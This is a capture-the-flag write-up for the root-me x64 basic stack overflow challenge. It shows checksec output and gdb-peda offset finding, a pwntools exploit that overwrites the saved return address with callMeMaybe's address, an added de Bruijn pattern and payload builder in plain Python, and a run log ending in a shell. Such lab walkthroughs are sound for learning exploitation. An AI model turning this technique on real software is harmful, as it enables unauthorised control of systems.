root-me: x64 stack overflow basic
Steps:
checksec:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Plan: there is no canary and no PIE, so we can overwrite the saved return address with the fixed address of callMeMaybe. NX only stops shellcode on the stack; returning into code that already exists in the binary is unaffected. gdb shows the SIGSEGV in main, so it is main's saved return address that the overflow reaches. (If the jump into callMeMaybe later crashes inside a libc call such as system() on a newer libc, the stack is misaligned by 8 bytes; placing the address of a ret gadget in front of callMeMaybe's address fixes that.)
Calculate the distance from the start of the buffer to the saved return address with gdb-peda: send a pattern_create pattern, crash, then feed the pattern bytes that landed in the return-address slot to pattern_offset:
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400728 in main ()
gdb-peda$ pattern_offset A%JA%fA%5A
A%JA%fA%5A found at offset: 280
Exploit (exp_ch35.py):
from pwn import *

p = process('./ch35')
elf = ELF('./ch35')
# address of the function we want to return into; fixed because the binary has no PIE
sh = elf.symbols['callMeMaybe']

# 280 bytes of filler reach the saved return address, then the 8-byte little-endian target
payload = b'a' * 280 + p64(sh)
print(payload)
p.sendline(payload)
p.interactive()
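As an added example (not part of the original writeup or of the root-me challenge), here is what pattern_offset and p64 are doing, in plain Python 3 with no pwntools dependency: a de Bruijn pattern in which every 4-byte window is unique, a lookup from the crash value back to the offset, and the payload builder with a bad-byte check. The callMeMaybe address 0x400696 is read from the printed payload of the exploit run (the trailing \x96\x06@\x00\x00\x00\x00\x00); the crash value used in __main__ is constructed, and the newline bad-byte check assumes ch35 reads its input with a gets()/fgets()-style call, which the writeup does not show.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# From the writeup: the printed payload ends in \x96\x06@\x00\x00\x00\x00\x00,
# i.e. callMeMaybe is at 0x400696 (no PIE, so the address is fixed).
CALL_ME_MAYBE = 0x400696
OFFSET = 280


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a de Bruijn sequence: every n-byte window occurs exactly once,
    which is what lets a crash value map back to a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """Equivalent of gdb-peda's pattern_create (different alphabet, same idea)."""
    return bytes(islice(de_bruijn(), length))


def find_offset(crash_value, max_len=0x10000):
    """Equivalent of pattern_offset: given the 8-byte value that ended up in the
    return-address slot (the bytes PEDA shows at the crash), return its distance
    from the start of the pattern. The low 4 bytes already identify it uniquely."""
    needle = struct.pack("<Q", crash_value)[:4]
    pos = cyclic(max_len).find(needle)
    if pos < 0:
        raise ValueError("value %#x is not part of the pattern" % crash_value)
    return pos


def has_bad_bytes(target, bad_bytes=b"\n"):
    """Assumption: ch35 reads a line with gets()/fgets(), so a 0x0a byte inside
    the packed address would cut the payload short. The embedded NUL bytes of a
    0x4xxxxx address are fine for a line-based read."""
    addr = struct.pack("<Q", target)
    return any(bytes([b]) in addr for b in bad_bytes)


def build_payload(offset, target):
    """Same layout as the exploit above: filler up to the saved return address,
    then the target packed as a little-endian 64-bit pointer (what p64 does)."""
    if has_bad_bytes(target):
        raise ValueError("target %#x contains a bad byte" % target)
    return b"a" * offset + struct.pack("<Q", target)


if __name__ == "__main__":
    # Constructed crash value: the 8 bytes at offset 280 of a 400-byte pattern,
    # read little-endian as the CPU would when ret pops them.
    pattern = cyclic(400)
    crash_rip = int.from_bytes(pattern[OFFSET:OFFSET + 8], "little")
    print("crash value %#x -> offset %d" % (crash_rip, find_offset(crash_rip)))
    print(build_payload(OFFSET, CALL_ME_MAYBE))
```

Running the file prints the offset recovered from the constructed crash value (280) and a payload identical to the one the pwntools script sends. The same find_offset() call works on a real crash: read the 8 bytes at RSP (or the value in RIP) from gdb after sending cyclic(400) and pass them in as an integer.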
Run the exploit script:
⚡ root@pwn /mnt/hgfs/pwnexc/root-me/x64 stack overflow basic python exp_ch35.py
[+] Starting local process './ch35': pid 4337
[*] '/mnt/hgfs/pwnexc/root-me/x64 stack overflow basic/ch35'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x96\x06@\x00\x00\x00\x00\x00
[*] Switching to interactive mode
Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b
$ id
uid=0(root) gid=0(root) groups=0(root)
$